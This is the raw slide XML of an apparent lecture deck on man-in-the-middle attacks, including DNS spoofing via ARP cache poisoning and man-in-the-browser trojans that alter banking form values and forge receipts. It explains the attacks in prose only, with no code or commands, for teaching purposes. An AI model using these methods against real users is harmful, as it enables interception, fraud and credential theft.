            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various ways to do MITM attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3853D87-AC85-4201-BDC9-624F44AF7408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5576888" cy="4773958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The architecture of DNS servers throughout enterprises and the Internet is hierarchical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Due to the hierarchical nature of the DNS structure of the Internet, DNS servers need the ability to communicate with each other in order to locate answers for the queries submitted by clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This is where recursion comes into play. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recursion is when one DNS server queries another DNS server on behalf of a client who has made a request. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Basically, this turns a DNS server into a client itself as seen in Figure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://techgenix.com/content/ws/img/upl/image0061270494115171.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90359815-701C-49E6-AC48-54D89B1BE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088" y="3071606"/>
            <a:ext cx="5457825"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37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88EFA-8C1A-44F0-9267-9D24E7B7340A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various ways to do MITM attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897F7899-CFA4-4F3B-8963-17A0BBC93362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="11353800" cy="5032375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>Every DNS query that is sent out over the network contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a uniquely generated identification number that's purpose is to identify queries and responses and tie them together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>This means that if our attacking computer can intercept a DNS query sent out from a target device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, all the attacker has to do is to create a fake packet response (with bogus query answer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that contains that identification number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>in order for that packet to be accepted by that target and MITM attack is launched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>The attacker will ARP cache poison the target device to reroute its traffic through the attacking host computer so that attacker can intercept the DNS request (packets with port 53), and then attacker will actually send the spoofed packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>Through this MITM attack, the hacker can divert all DNS queries asking for IP of a web server to his own IP addresses, thus creating phishing website and steal information i.e., session ID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" dirty="0"/>
              <a:t>The attacker can then put the actual DNS server under stress by sending a large number of queries with the stolen session ID (impersonating the client) thus launching a DOS attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3083346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9B304B-9FB0-4DD8-B966-82F5986ECE1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Man in the Browser Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DDDB06-760E-4082-8E54-DBECAFA8E439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="11172825" cy="4794250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Commonly called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>MitB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Man In The Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> attack is one of the most dangerous types of attacks a cyber criminal can use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>The Man-in-the-Browser attack is the same approach as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D7BD7"/>
                </a:solidFill>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>Man-in-the-middle attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>, but in this case a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D7BD7"/>
                </a:solidFill>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>Trojan Horse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t> is used to intercept and manipulate calls between the main application’s executable (ex: the browser) and its security mechanisms or libraries on-the-fly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This method employs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the usage of a Trojan Horse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>or similar malware to gain important information from users of websites, especially banking and credit card information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>The most common objective of this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>attack is to cause financial fraud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>by manipulating transactions of Internet Banking systems, even when other authentication factors are in use.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is a piece of code that alters or adds different input fields to a webpage you are visiting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Since the URL is not changed, you believe that the site needs that information, you simply fill it in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2554803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BA05-1749-4B76-A031-60B91FBAD684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How is Man in the Browser Attack implemented ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDB3CD4-BAC0-443B-82DB-648799443FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example 1 (Altering the information)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The Trojan infects the computer's software, either OS or Application. The Trojan installs an extension into the browser configuration, so that it will be loaded next time the browser starts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>At some later time, the user restarts the browser. The browser loads the extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The extension registers a handler for every page-load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Whenever a page is loaded, the URL of the page is searched by the extension against a list of known sites targeted for attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Suppose, the user logs in securely on to for example https://secure.original.site/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>When the handler detects a page-load for a specific pattern in its targeted list (for example https://secure.original.site/account/do_transaction) it registers a button event handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225237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4D65-026D-4703-B1CD-E6C280363506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How is Man in the Browser Attack implemented ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279F5EDF-8B35-4E84-9217-A68621C7BF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>When the submit button is pressed, the extension extracts all data from all form fields through the DOM interface in the browser, and remembers the values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The Document Object Model is a cross-platform and language-independent API that treats an HTML, XHTML, or XML document as a tree structure where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in each node is an object representing a part of the document. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The DOM model represents a document with a logical tree.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The extension then modifies the values through the DOM interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The extension tells the browser to continue to submit the form to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The browser sends the form, containing the modified values to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153874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F46B-7D28-4602-9781-79BB2E75CB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How is Man in the Browser Attack implemented ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E387716-1DED-427A-83C1-9D6620C7E76F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The server receives the modified values in the form as a normal request. The server cannot differentiate between the original values and the modified values, or detect the changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The server performs the transaction and generates a receipt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The browser receives the receipt for the modified transaction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The extension detects the https://secure.original.site/account/receipt URL, scans the HTML for the receipt fields, and replaces the modified data in the receipt with the original data that it remembered in the HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The browser displays the modified receipt with the original details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The user thinks that the original transaction was received by the server intact and authorized correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397084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FE07-1F9F-40FF-A024-2FE8E6DC6FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732183" y="2766218"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255708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87E1-D5DC-4FF6-AF60-381FB18913E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How is Man in the Browser Attack implemented ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0039529-F658-4239-AAFE-7E07B0212C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10903226" cy="4787210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example 2 (Adding more fields)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" dirty="0"/>
              <a:t>A malware like a Trojan Horse is situated between your computer and the site server. Using that malware, different input fields are added to the website, asking you for your confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" dirty="0"/>
              <a:t>The malware in the browser attempts to access the Internet Connect function in Wininet.dll.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>Wininet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>, which is a superset to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>WinHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>, is an API within Internet Explorer that enables applications to interact with FTP and HTTP protocols to access internet resources. Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>wininet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t> functions are targeted by MITB including the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>httpsendrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>navigateto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>httpopenrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>httpsendrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>internetreadfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t> () etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3382155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87E1-D5DC-4FF6-AF60-381FB18913E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How is Man in the Browser Attack implemented ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0039529-F658-4239-AAFE-7E07B0212C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10903226" cy="4787210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
